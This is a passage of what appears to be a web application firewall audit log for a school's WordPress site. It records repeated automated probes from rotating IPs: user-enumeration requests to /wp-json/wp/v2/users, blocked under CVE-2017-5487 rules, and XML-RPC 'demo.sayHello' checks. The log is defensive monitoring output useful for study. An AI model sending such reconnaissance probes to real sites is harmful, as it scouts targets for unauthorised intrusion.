Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --115ae84d-Z-- --59632909-A-- [05/May/2025:22:57:26 +0700] aBjf5k2V_h1VFAgsfgZ7ywAAABQ 103.236.140.4 41556 103.236.140.4 8181 --59632909-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --59632909-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59632909-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460646008775 2377 (- - -) Stopwatch2: 1746460646008775 2377; combined=1291, p1=399, p2=859, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59632909-Z-- --dc809a19-A-- [05/May/2025:22:57:28 +0700] aBjf6E2V_h1VFAgsfgZ70gAAABI 103.236.140.4 41588 103.236.140.4 8181 --dc809a19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc809a19-C-- demo.sayHello --dc809a19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc809a19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460648765301 5654 (- - -) Stopwatch2: 1746460648765301 5654; combined=4361, p1=517, p2=3542, p3=34, p4=35, p5=131, sr=71, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc809a19-Z-- --8d256d1d-A-- [05/May/2025:22:57:32 +0700] aBjf7ARwKNFSM6B7_LafWwAAAIg 103.236.140.4 41628 103.236.140.4 8181 --8d256d1d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.107 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d256d1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d256d1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460652343158 2669 (- - -) Stopwatch2: 1746460652343158 2669; combined=1238, p1=426, p2=782, p3=0, p4=0, p5=29, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d256d1d-Z-- --5bead845-A-- [05/May/2025:22:57:36 +0700] aBjf8E2V_h1VFAgsfgZ72wAAAAk 103.236.140.4 41670 103.236.140.4 8181 --5bead845-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.107 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5bead845-C-- demo.sayHello --5bead845-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bead845-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460656147732 5616 (- - -) Stopwatch2: 1746460656147732 5616; combined=4220, p1=543, p2=3448, p3=36, p4=36, p5=93, sr=70, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bead845-Z-- --da201b03-A-- [05/May/2025:22:58:42 +0700] aBjgMgRwKNFSM6B7_LafgQAAAIc 103.236.140.4 42252 103.236.140.4 8181 --da201b03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da201b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da201b03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460722366076 2688 (- - -) Stopwatch2: 1746460722366076 2688; combined=1390, p1=548, p2=813, p3=0, p4=0, p5=29, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da201b03-Z-- --563cc00a-A-- [05/May/2025:22:58:45 +0700] aBjgNfZJDMuQndL03JNbfgAAAFg 103.236.140.4 42272 103.236.140.4 8181 --563cc00a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --563cc00a-C-- demo.sayHello --563cc00a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --563cc00a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460725334363 6215 (- - -) Stopwatch2: 1746460725334363 6215; combined=4426, p1=551, p2=3634, p3=30, p4=36, p5=102, sr=72, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --563cc00a-Z-- --6d5f8028-A-- [05/May/2025:23:04:10 +0700] aBjhevZJDMuQndL03JNcPAAAAEk 103.236.140.4 44890 103.236.140.4 8181 --6d5f8028-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6d5f8028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d5f8028-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461050159983 2639 (- - -) Stopwatch2: 1746461050159983 2639; combined=1223, p1=433, p2=762, p3=0, p4=0, p5=28, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d5f8028-Z-- --0f5f857a-A-- [05/May/2025:23:04:13 +0700] aBjhfQRwKNFSM6B7_Laf8QAAAJY 103.236.140.4 44910 103.236.140.4 8181 --0f5f857a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f5f857a-C-- demo.sayHello --0f5f857a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f5f857a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461053567898 5221 (- - -) Stopwatch2: 1746461053567898 5221; combined=4117, p1=520, p2=3353, p3=31, p4=35, p5=104, sr=73, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f5f857a-Z-- --b5ba5526-A-- [05/May/2025:23:08:04 +0700] aBjiZIZWvR7-42f6JrAM_gAAANY 103.236.140.4 46526 103.236.140.4 8181 --b5ba5526-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5ba5526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5ba5526-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461284879393 2390 (- - -) Stopwatch2: 1746461284879393 2390; combined=1372, p1=437, p2=904, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5ba5526-Z-- --2bec877d-A-- [05/May/2025:23:08:07 +0700] aBjiZ02V_h1VFAgsfgZ9KgAAAAU 103.236.140.4 46546 103.236.140.4 8181 --2bec877d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2bec877d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bec877d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461287103191 2320 (- - -) Stopwatch2: 1746461287103191 2320; combined=1091, p1=379, p2=684, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bec877d-Z-- --c6fc4f72-A-- [05/May/2025:23:08:08 +0700] aBjiaE2V_h1VFAgsfgZ9KwAAAAs 103.236.140.4 46552 103.236.140.4 8181 --c6fc4f72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c6fc4f72-C-- demo.sayHello --c6fc4f72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6fc4f72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461288078205 5026 (- - -) Stopwatch2: 1746461288078205 5026; combined=3986, p1=449, p2=3316, p3=34, p4=36, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6fc4f72-Z-- --1a67280f-A-- [05/May/2025:23:08:09 +0700] aBjiaU2V_h1VFAgsfgZ9LgAAABc 103.236.140.4 46574 103.236.140.4 8181 --1a67280f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1a67280f-C-- demo.sayHello --1a67280f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a67280f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461289880574 5858 (- - -) Stopwatch2: 1746461289880574 5858; combined=4242, p1=538, p2=3472, p3=34, p4=34, p5=96, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a67280f-Z-- --a3541d14-A-- [05/May/2025:23:08:11 +0700] aBjia02V_h1VFAgsfgZ9MQAAAAA 103.236.140.4 46584 103.236.140.4 8181 --a3541d14-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3541d14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3541d14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461291202210 3185 (- - -) Stopwatch2: 1746461291202210 3185; combined=1422, p1=471, p2=920, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3541d14-Z-- --a5ba9b03-A-- [05/May/2025:23:08:14 +0700] aBjibvZJDMuQndL03JNcwwAAAEw 103.236.140.4 46614 103.236.140.4 8181 --a5ba9b03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5ba9b03-C-- demo.sayHello --a5ba9b03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5ba9b03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461294180508 5017 (- - -) Stopwatch2: 1746461294180508 5017; combined=4085, p1=500, p2=3345, p3=33, p4=35, p5=101, sr=73, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5ba9b03-Z-- --6789c50f-A-- [05/May/2025:23:08:22 +0700] aBjidvZJDMuQndL03JNc0gAAAE8 103.236.140.4 46710 103.236.140.4 8181 --6789c50f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6789c50f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6789c50f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461302426946 2249 (- - -) Stopwatch2: 1746461302426946 2249; combined=1259, p1=400, p2=830, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6789c50f-Z-- --e063e642-A-- [05/May/2025:23:08:25 +0700] aBjiefZJDMuQndL03JNc2gAAAEA 103.236.140.4 46738 103.236.140.4 8181 --e063e642-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e063e642-C-- demo.sayHello --e063e642-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e063e642-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461305500119 5761 (- - -) Stopwatch2: 1746461305500119 5761; combined=4403, p1=607, p2=3517, p3=38, p4=43, p5=114, sr=79, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e063e642-Z-- --59639b03-A-- [05/May/2025:23:08:31 +0700] aBjifwRwKNFSM6B7_LagZAAAAJM 103.236.140.4 46786 103.236.140.4 8181 --59639b03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --59639b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59639b03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 